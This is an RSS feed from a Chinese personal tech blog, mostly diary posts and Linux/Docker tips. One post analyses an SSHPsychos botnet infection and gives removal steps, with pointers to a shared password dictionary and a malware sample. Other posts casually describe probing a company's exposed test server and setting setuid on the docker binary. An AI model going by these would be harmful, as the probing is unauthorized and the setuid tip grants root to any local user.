至于Python的学习以及每天刷题，还是不做什么计划安排了，想起来就去做一道题，反正这本书摆在桌子上，是怎么也不可能忘掉的。
还有就是想要看完那本二百多页的自底向下的计算机的书，可时还有一本计算机网络没有看完，嗯……好麻烦。
话说我用markdown跟不用markdown也没什么太大的区别，也就是写写字，顶多贴个代码，插个图片，还有什么呢？表格？链接？能用到的也就这么多了吧。
然后今天的任务是先把硬盘搞定，里面的文件就懒得恢复了，恢复了也没什么用，虚拟机再配置就是了，镜像也可以再下，至于海绵宝宝和雷蒙德，唔，在线看也好。
长远目标还有把博客改改版，毕竟这个样子还是有点low。
还有一些东西需要了解，端口复用啊，重定向啊，管道啊，动态域名解析啊，都是些零零碎碎的了。
还得每天检查邮件，检查服务器的运行情况。对了，我可以写个脚本让服务器把监测的信息发给我嘛，就这么定了。那什么时候写呢？等我把离线下载写完？天，我还想用Python把离线下载重写一遍。
我还想学集群管理，不过首要任务还是先学好Docker，多做几个image，push到dockerhub上，哎对了，之前不是说要做一些hack的image嘛，还得研究研究怎样把那些镜像弄成docker，关键是那些镜像都太小了，得好好琢磨琢磨。
又乱七八糟的了。</description>
    </item>
    
    <item>
      <title>内涵图网站</title>
      <link>https://wrfly.kfd.me/posts/%E5%86%85%E6%B6%B5%E5%9B%BE%E7%BD%91%E7%AB%99/</link>
      <pubDate>Thu, 04 Feb 2016 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/%E5%86%85%E6%B6%B5%E5%9B%BE%E7%BD%91%E7%AB%99/</guid>
      <description>前几天做了一个内涵图的网站：http://10pic.kfd.me
起因是上个月QQ空间的一个应用“10张内涵图”倒闭了，但是里面的图片都很好玩，我就在倒闭的那天把图片全都爬了下来，整理了大约3650张，然后做了一个这样的网站。
原来想着是自己撸一个PHP的相册，但是觉着这样技术难度对我来收有点高。。（自己太low了）于是就利用现成的东西，hexo的博客，搭建了这样一个图片展示网站。
图片全都储存在我的磨，原来是想放到7牛云的，但是里面注册成标准会员还要拍身份证，还要正反面，我就没啰嗦那些事儿，果断想到了“我的磨”。
可能你会说为什么不放到VPS上啊，我的考虑是这样的，万一那天VPS关了，里面的东西这么多，一时半会儿也倒不出来，还不如放到别人哪儿，别人给你保存的好好的，虽说网速不快，但是，能用就行啊，要啥自行车啊。
期间遇到的问题就是整理图片比较麻烦，一是重命名，二是把这些图片的url都写到md文件中，不过想好了思路，也就几行代码的事儿，期间也温习了一下怎样搭建hexo的博客，都是很草率的做事，没有什么标准的计划和方案，我想以后学了PHP在自己写一个照片库吧：）
前前后后大约花了5个小时，不算长。
中间在V站分享的时候，部分人说图挂了，但是我这里是好好的，不过有位知情者指出，是移动屏蔽了我的磨的网址（wodemo.com）把它换成.net(wodemo.net)就好了。再次表示感谢。
这一个月没干什么大事，都是些鸡零狗碎的情感问题。
打算在寒假学Python。
还有半个多月。</description>
    </item>
    
    <item>
      <title>Linux 101 hacks的翻译-gitbook</title>
      <link>https://wrfly.kfd.me/posts/linux-101-hacks%E7%9A%84%E7%BF%BB%E8%AF%91-gitbook/</link>
      <pubDate>Fri, 01 Jan 2016 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/linux-101-hacks%E7%9A%84%E7%BF%BB%E8%AF%91-gitbook/</guid>
      <description>啊啊啊, 转眼间就2016年了, 时间过得真快&amp;hellip;
最近呢也没闲着, 翻译了之前那本书, 现在进度条已经滚到20%了&amp;hellip; 自己觉着翻译的还是很好的 ^_^
放到gitbook了,链接在此:https://www.gitbook.com/book/wrfly/linux-101-hacks/details
对bash感兴趣的去捧个场呀~
里面废话没有我说的这么多, 书面语言总是比口头语言简练~</description>
    </item>
    
    <item>
      <title>两个软件和一个rename</title>
      <link>https://wrfly.kfd.me/posts/%E4%B8%A4%E4%B8%AA%E8%BD%AF%E4%BB%B6%E5%92%8C%E4%B8%80%E4%B8%AArename/</link>
      <pubDate>Sat, 12 Dec 2015 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/%E4%B8%A4%E4%B8%AA%E8%BD%AF%E4%BB%B6%E5%92%8C%E4%B8%80%E4%B8%AArename/</guid>
      <description>rename 先说rename 批量重命名的好东西，支持正则匹配，超级厉害。
做个测试：
for i in {1..9};do touch Hello-$i.txt;done
然后：
rename &amp;rsquo;s/(\w*-(\d+))/\2-\1/&amp;rsquo; *.txt
是不是很厉害～
lolcat &amp;amp; script 然后再说这两个好玩的软件
lolcat在ubunut上直接 apt-get install lolcat 就能用。为了保持神秘感，不上图了，只能告诉你它很酷炫～
然后再加一个function cat() { /bin/cat $@ | lolcat; } 这样就能让cat变成lolcat了～
script - 很神奇的命令录制软件
他不是屏幕录制，而是录制你的输入，通过生成的time文件和txt文件重放出来（scriptrepaly）
录制： script -t 2&amp;gt; script.time record.txt
重放： scriptreplay script.time record.txt
程序员是改变世界的人！</description>
    </item>
    
    <item>
      <title>Docker笔记</title>
      <link>https://wrfly.kfd.me/posts/docker%E7%AC%94%E8%AE%B0/</link>
      <pubDate>Thu, 10 Dec 2015 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/docker%E7%AC%94%E8%AE%B0/</guid>
      <description>From: https://www.gitbook.com/book/yeasy/docker_practice/details
BASIC Just some commands&amp;hellip;
sudo chmod +s /usr/bin/docker (give docker an &amp;rsquo;s&amp;rsquo;)
docker pull ubuntu (like git..)
docker run -idt &amp;ndash;hostname test &amp;ndash;name test ubuntu (a background ubuntu bash, use docker-enter to enter it or nsenter its pid)
docker rm (rm containers)
docker rm $(docker ps -a -q)
docker rmi (rm images)
From: https://raw.githubusercontent.com/yeasy/docker_practice/master/_local/.bashrc_docker
docker-enter container
docker run -d -p 5000:5000 registry
docker run -idt &amp;ndash;hostname test -v /opt/docker-share:/root/share ubuntu (When rm use docker rm -v xxx)</description>
    </item>
    
    <item>
      <title>20151125</title>
      <link>https://wrfly.kfd.me/posts/20151125/</link>
      <pubDate>Wed, 25 Nov 2015 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/20151125/</guid>
      <description>乱七八糟的过完了这两个月。
时间都在忙活一个项目，只是不能告诉你这个项目是什么。
三千多个注册用户，八百多个使用用户，三百多个常用用户，以及三十多个在线用户。
不懂php，不懂python，唯一会的就是配服务器，然而还曾经被打死过。20M/s就挂了，弱爆了。
先是某个中午脑子里蹦出这个念头，再是域名注册，然后用Github的福利答了几台服务器，然后购买别家的服务器，然后更新服务端程序，然后更新博客，又添加了一些功能和在线支付，哦对，之前还开过淘宝店。上个周末又更新了主页，变成了高大上的风格。
嗯，还是不景气。
嗯，不知道现在该干啥了。
嗯，不会推广。
嗯，自己一个人。
中间夹杂了好多事儿，比如分手啊，比如复合啊，比如又分手啊。还参加了一次CTF决赛，拿了一千块的路费之后双十一挥霍买了Kindle然而也没看过几次……
时间过得好快。昨天刚买了回家的火车票。
折腾是为了啥呢？为了折腾。
那天晚上空虚的不行，想着，要不给移动硬盘装个系统吧，然后就动身了，到底也没装好，但是整个人立马就精神了许多。多动症。
那天晚上去了一次选修课，那老师说电脑内存至少要8G，最好是32G，要不玩不了。电脑音乐制作。吓得我决定下学期再选一门别的。
哦对了，昨天把我的个人信息卖给了趣分期，卖了20块，真后悔了，还不如去群里守着等红包呢。然后顺手测试了一波趣分期，发现了一个测试站，估计是蜜罐，对，绝对是，PHPdebug bar还在下面开着，哪有程序员这么二逼，各种路径，还有数据库的名字。apitest.qufenqi.com 不知道下次来看的时候这个站还有没有。
这个项目算是我最成功的一个了，啪，一共就三个。
还是败在了推广上面，当然，我自己也没激情了，其实还是不知道下一步要做什么了。也只好慢慢等，慢慢来。
那么问题来了，我都干了些啥呢？
书都是看了一半，过几天就要去还了。还有借的别人的Python的书，妈蛋我连看都没看啊，可耻！
这两个月茶也没怎么喝，幸亏保质期长，茶壶也不会生锈。
百无聊赖。
就这样吧。</description>
    </item>
    
    <item>
      <title>接着上一篇</title>
      <link>https://wrfly.kfd.me/posts/%E6%8E%A5%E7%9D%80%E4%B8%8A%E4%B8%80%E7%AF%87/</link>
      <pubDate>Tue, 27 Oct 2015 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/%E6%8E%A5%E7%9D%80%E4%B8%8A%E4%B8%80%E7%AF%87/</guid>
      <description>安装软件：  Kali套装 tree mtr nautilus-open-in-terminal indicator-multiload RedNoteBook stardict (and its icon, dictionary) Sublimetext Sougoupinyin UberWriter FocusWriter Chrome Firefox (Notice: Firefox won&amp;rsquo;t backup your bookmarks or so, it just sync your configs form one to another) Unity Tweak Tool Java Clementine # Music Virtual box VMware Thunder bird ( with all email accounts ) uGet htop most pv git python-pip curl tomate indicator-stickynotes  更改SWAP分区 添加或删除 默认有8G的swap分区，太大了，用不着，用 system-config-lvm 图形化管理器把lv减小，这软件很棒，不用敲命令，可视化的。 先把swap关闭 swapoff -a 然后重启，进入LiveCD模式。 把默认的swap分区删除，然后扩大主分区，再新建一个你想要的swap大小的lv，重启。</description>
    </item>
    
    <item>
      <title>Yep,installed my Ubnutu again</title>
      <link>https://wrfly.kfd.me/posts/yepinstalled-my-ubnutu-again/</link>
      <pubDate>Sun, 25 Oct 2015 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/yepinstalled-my-ubnutu-again/</guid>
      <description>At first I have to say what I&amp;rsquo;m writing blow is all bull shit.
For these days I reinstall my Ubuntu, this is a sad story&amp;hellip;
The reason is that I made a mistake when I repartitioned the disk. At first I want to resize the EFI partition and the boot partition because the original EFI partition is too big for me(500M) and the boot partition is a little small(just 200M), you know it&amp;rsquo;s unreasonable, so I decided to resize it.</description>
    </item>
    
    <item>
      <title>20151007</title>
      <link>https://wrfly.kfd.me/posts/20151007/</link>
      <pubDate>Wed, 07 Oct 2015 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/20151007/</guid>
      <description>一个月过去了，项目进展的也差不多。
一个多月以来，一个不会Python，不会PHP的人硬是改了PHP的网站和Python的程序，前几天还加了一个Bash的离线下载功能，真的，收获颇丰。
也没具体统计一共敲了多少命令，但我想，一万行总该是有的吧，毕竟6-7台服务器呢，还有那么多大大小小的功能，么么哒，亲自己一个～
做项目期间遇到了很多人，友善的，不友善的，可爱的，不可爱的，形形色色，乱七八糟。人跟人真的不一样，讲真。国人就喜欢免费，简单，一键安装，甚至都不想动脑子，乌合之众。这也就是那么多一键安装包的崛起，你甚至都不知道它在干什么，毕竟一键安装，而你也点了同意。好在我用Ubuntu。
我不知道我的项目能够活多久，但我希望他能够活很久。至少把前几天送礼物的钱给赚出来吧。累死累活一个多月，不求走上人生巅峰，23333.前些日子还打印了一千张广告，真，1000张。这种人生体验，没几个人能有的吧。爽！
忽然发现自己写的乱七八糟的，是不是因为我这几个月没有练字的缘故？
国庆七天又重新温习了一下哈利波特，从一个孩子变成了父亲。人世间那还能有比爱更强大的力量呢？可，什么又是爱呢？汤姆不知道，我也不知道。也没有比生死离别更能打动人的事了，可，生死离别之后还剩下什么呢？我才不相信什么活在我心中这样的鬼话。
乱七八糟的，又是乱七八糟的，根本写不出东西。也许脑子里根本就没有东西。
课也不想上，去tm的点名。明天继续翻译VIM tutorial好了，还有Linux 101 hacks。
随便写点东西证明我的存在，我活的很好，只是每天不知道吃啥。</description>
    </item>
    
    <item>
      <title>百度更懂中文？</title>
      <link>https://wrfly.kfd.me/posts/%E7%99%BE%E5%BA%A6%E6%9B%B4%E6%87%82%E4%B8%AD%E6%96%87/</link>
      <pubDate>Thu, 27 Aug 2015 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/%E7%99%BE%E5%BA%A6%E6%9B%B4%E6%87%82%E4%B8%AD%E6%96%87/</guid>
      <description>windwos下mysql密码忘了，于是就用谷歌搜了一下，虽然输入错了，但是结果却令我大吃一惊。
对比下百度的结果，真是喜闻乐见了。</description>
    </item>
    
    <item>
      <title>Oh-123</title>
      <link>https://wrfly.kfd.me/posts/oh-123/</link>
      <pubDate>Mon, 24 Aug 2015 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/oh-123/</guid>
      <description>这几天乱七八糟的，乱七八糟的人，乱七八糟的培训。
安装DVWA啊，配置PHP啊，一天学会Python啊，21天当黑客啊…… 呵呵，太扯了。
唯一让我觉得不扯的事情就是昨天跟WSK和LCY出去吃饭。
还有我前几天开的那个 http://123.kfd.me
其实很早就想做一个导航类的网站了，暑假太懒，那天傍晚忽然又想起来了，于是乎，拖到了第二天，终于从lofter找到一个模板当背景，添加链接上去。
两年的收藏夹啊，一些资源网站，好玩的网站，有用的网站，偏僻的网站。配色有点暗，bigtang说我咋就这么喜欢黑色。嘿，我就喜欢了。
大部分是关于Linux的，有部分是关于hack（web penetration test）的，少部分是关于音乐视频的。Oh，这就是我的生活了。
昨天老胡说要交上周的报告，尼玛，啥报告啊，安装DVWA嘛，一天速成Python嘛，写个蛋啊。除了那个连接图片的还有点意思以外，别的我是真没兴趣（当然，也没做，也许还做不出来呢～），傲娇了。。
所以我决定还是自己搞PT吧，争取两天完成一个pentesterlab上的镜像，然后再把那三个vuln.OS搞一搞，暑假的那几天学了学metasploit，也没派上多大用场。
师父领进门，修行在个人。我tm连个师傅都没，要是自学成才了，那得戴一顶多大的帽子。
嗯，就酱吧。</description>
    </item>
    
    <item>
      <title>如何背程序</title>
      <link>https://wrfly.kfd.me/posts/%E5%A6%82%E4%BD%95%E8%83%8C%E7%A8%8B%E5%BA%8F/</link>
      <pubDate>Tue, 18 Aug 2015 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/%E5%A6%82%E4%BD%95%E8%83%8C%E7%A8%8B%E5%BA%8F/</guid>
      <description>今天看慕课网的时候，看到关于编程思想的这一部分， 然后就看到Tony老师说如何“背”程序：
 抄写老师的程序并能正确运行。 为程序补全注释 删掉注释，为代码重新加注释 看注释写代码 删掉代码和注释，从头开始写  个人感觉还是很有道理的。
毕竟，一段代码吃不透，下次再吃的时候，就会消化不良，就会拉肚子。
&amp;ldquo;21天黑客速成&amp;rdquo;之类的东西还是少看。
不花费大量的时间就想掌握一门技能，痴人说梦。</description>
    </item>
    
    <item>
      <title>懒</title>
      <link>https://wrfly.kfd.me/posts/%E6%87%92/</link>
      <pubDate>Wed, 22 Jul 2015 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/%E6%87%92/</guid>
      <description>还是自己懒。
临近期末了还不好好预习，连挣扎都不舍得挣扎一下。
不想学那些没用的东西，不好玩，没意思。所以就把懒当做借口，把“学了没用”作为挡箭牌了。
别人问我，你不学习你都干啥了，我支支吾吾答不上来。因为我也不知道自己干啥了，没有看书，没有写代码，没有搭建啥服务，也没有看电影。
前几天看美剧，但是毕竟还看了点书，尽管我知道看完之后并没有什么卵用。Both books and movies.
现在想想，到底什么有用呢？或许什么都没有用，什么都有用。想当年……学了那么多乱七八糟的都不如多跟，自己也没吐过一句槽。根茎叶花果种子……有个鸟用。都不如多跟人聊聊天，还能练练打字，以后敲代码也娴熟。
真的是这样吗？
我一直拿“学了没用”和“根本不感兴趣”来敷衍，因为我没有别的话可说了，因为我整个学期都没听过几次课，因为我没学这些东西，因为我没付出。所以，雪崩一旦开始就再也停不下来了。凭啥，凭啥挂科？就凭这个。
但是好在我看开了，破罐子破摔的话，我也碎掉了～哈哈哈。
这样也就没负担了，就像那些亡命之徒，早晚都是死，拉几个垫背的？
早晚都毕不了业，干嘛不干点好玩的？
于是乎，所以。
并没有忘记自己的初心，也许我写不出windows这样的系统了，但是这也并不妨碍我成为一个hacker的计划。 要学的东西好多好多，时间是个大问题，我相信自己会有一个好的前程，毕竟……，是吧。
多写代码少说话。
本来嘛，大学就不是为了混毕业证的，拿了一纸文凭，还不是出来干活。啥？不会写代码？出去。
所以这个毕业证我是不抱有太大希望了。嗯……要是老师开恩给个60，那我也不反对～
懒。
懒得字都不想打，书都不想翻，视频也懒得看，饭也懒得吃，算了，我还是去圈里呆着吧。
宿舍里也乱七八糟的，只好带上耳机听音乐。
写的也乱七八糟的，只好留给自己看。
多年后再回首：“卧槽我当年期末的时候还这么懒。” 嗯，不错。</description>
    </item>
    
    <item>
      <title>These-days</title>
      <link>https://wrfly.kfd.me/posts/these-days/</link>
      <pubDate>Sun, 07 Jun 2015 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/these-days/</guid>
      <description>突如其来的就想用英语写点东西了，好，就用英语写篇不算日记的日记吧。
Let&amp;rsquo;s talk about what i have done these days&amp;hellip;
First, I took part in a CTF game and tried to figured out a problem which ask me to find a flag in a broken disk image.And, my disk was broken&amp;hellip;.
Second, my GPT(GUID Partition Table) was broken and I lost lots of files.
Third, I changed my HHD to a SSD.
Not all yet.
Finally I found all my files without filenames&amp;hellip;.</description>
    </item>
    
    <item>
      <title>发生在我同学身上的SSH Psychos</title>
      <link>https://wrfly.kfd.me/posts/%E5%8F%91%E7%94%9F%E5%9C%A8%E6%88%91%E5%90%8C%E5%AD%A6%E8%BA%AB%E4%B8%8A%E7%9A%84ssh-psychos/</link>
      <pubDate>Sun, 03 May 2015 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/%E5%8F%91%E7%94%9F%E5%9C%A8%E6%88%91%E5%90%8C%E5%AD%A6%E8%BA%AB%E4%B8%8A%E7%9A%84ssh-psychos/</guid>
      <description>今天下午bigtang过来说他的VPS也被lock了，DigitalOcean的staff说是有ddos攻击，第一反应是vps沦为了肉鸡，第二反应是，还真是被日了。
说起来都有点搞笑，一个搞安全的，自己的vps竟然也会被日，23333.
连接上VNC，登陆进去之后，发现本地目录多了一个 i 文件夹，ps -aux 会发现一些别的命令一直在运行（当时没有截图留念，真是可惜了），
首先做的是查看登录日志，发现在Apr 30这一天有几台主机一直在暴力登陆本机，ip段为43.255.190.0/23，香港的，一开始是以为这是几台肉鸡，被用来ssh爆破的，但是问题远远没有这么简单。
/var/log/btmp 文件是用来记录ssh登陆的，bigtang那个竟然有38M，我真是醉了，服务器的auth.log也不小，在四月三十号这天，ssh爆破进行了一天。。。唉，有个僵尸网络就是爽。。。大约爆破了十一个小时后，坏人成功了。
首先说一下这个木马会干什么: 1.创建开机启动脚本，放在/etc/init.d/目录下，文件名随机
2.创建周期脚本，每小时运行一次，/etc/cron.hourly/gcc.sh
3.创建一个可执行的so文件，放在 /lib/libudev.so
那么这个木马的恶心之处在于什么呢？ 文件不死，因为脚本一直在内存中运行，会不断检测自身是否存在于 /lib/libudev.so 这个文件中，如果不存在,则创建一个并且销毁存在于其他地方的自身。这一步完成之后，这个.so文件还会创建一个开机启动脚本并且设置为开机启动，然后他就会写入shell到gcc.sh,也就是/etc/cron.hourly/gcc.sh。
这就完了？不，远远没有，他还会自动检测其他的后门、病毒、和木马，并且删除掉他们，以确保自身的安全性和隐蔽性，最重要的是对于主机的完全控制权。 然后听从来自某台主机的命令，在某个时刻统一发起DDOS攻击。。。
我粗略的扫了一下 43.255.190.0/23 这个网段，大约开了72台，并且！每台主机都开着22端口和6006端口！那么，6006莫非就是他的后门通信端口？
更为具体的说明在这：
Threat Spotlight: SSHPsychos
Group Uses over 300,000 Unique Passwords in SSH Log-In Brute-Force Attacks
把精神病关进黑洞
看Level 3与思科如何联手除掉僵尸网络
也许还会有更为严重的后果，但是我只能看得到这么多了，坐等糖果逆向牛把它搞定。他说要反艹他们来着，23333，但是首先得有一份好的字典啊～
这是上面提供的那一部分密码字典，我在这里一并奉上，如果你有什么好的字典，记得在下面留言撒～
最重要的来了！怎样摆脱这个后门呢？ 既然我们删除不掉它，那怎样才能摆脱它呢？
其实很简单，利用权限。
chmod 444 /lib/libudev.so 这一条命令执行完成后，删除掉 /etc/cron.hourly/gcc.sh
rm /etc/cron.hourly/gcc.sh  并且查看/etc/init.d/目录下最近修改的文件，一本来说文件名会是一串乱码，记录这个名字，然后取消其开机启动的link
更新之后删除这个文件。重启。然后再删除掉 /lib/libudev.so 文件。
搞定。
最后的最后 如果有人想玩一下这个后门，可以在虚拟机里面搞一搞，文件上传至这儿</description>
    </item>
    
    <item>
      <title>20141226</title>
      <link>https://wrfly.kfd.me/posts/20141226/</link>
      <pubDate>Fri, 26 Dec 2014 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/20141226/</guid>
      <description>第一个决定是，把我在blogger上面的文章全都同步到这儿来，然后，那个blogger就算abortion了吧。
原因很简单：麻烦。
第二个决定是做一件有意义的事情&amp;mdash;翻译一下VIM的入门教程。
尽管我知道已经有很多VIM的教程，还有一些中文版的说明文档什么的。但是昨天晚上看到了一片很好的入门教程，可惜是英文的，而且是一个单页面，我寻思工作量也不大，索性就当成一个项目来做吧，我觉得那一篇比网上的若干教程强多了～顺便放出原链接以及一个很“好玩”的练习VIM的网站</description>
    </item>
    
    <item>
      <title>my github</title>
      <link>https://wrfly.kfd.me/posts/my-github/</link>
      <pubDate>Sat, 06 Dec 2014 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/my-github/</guid>
      <description>just a hello word page
&amp;amp;
this blog framework is a copy of billie66
thanks for her work~
BUT NOW&amp;mdash;-I made a template for myself~ Just like this!</description>
    </item>
    
  </channel>
</rss>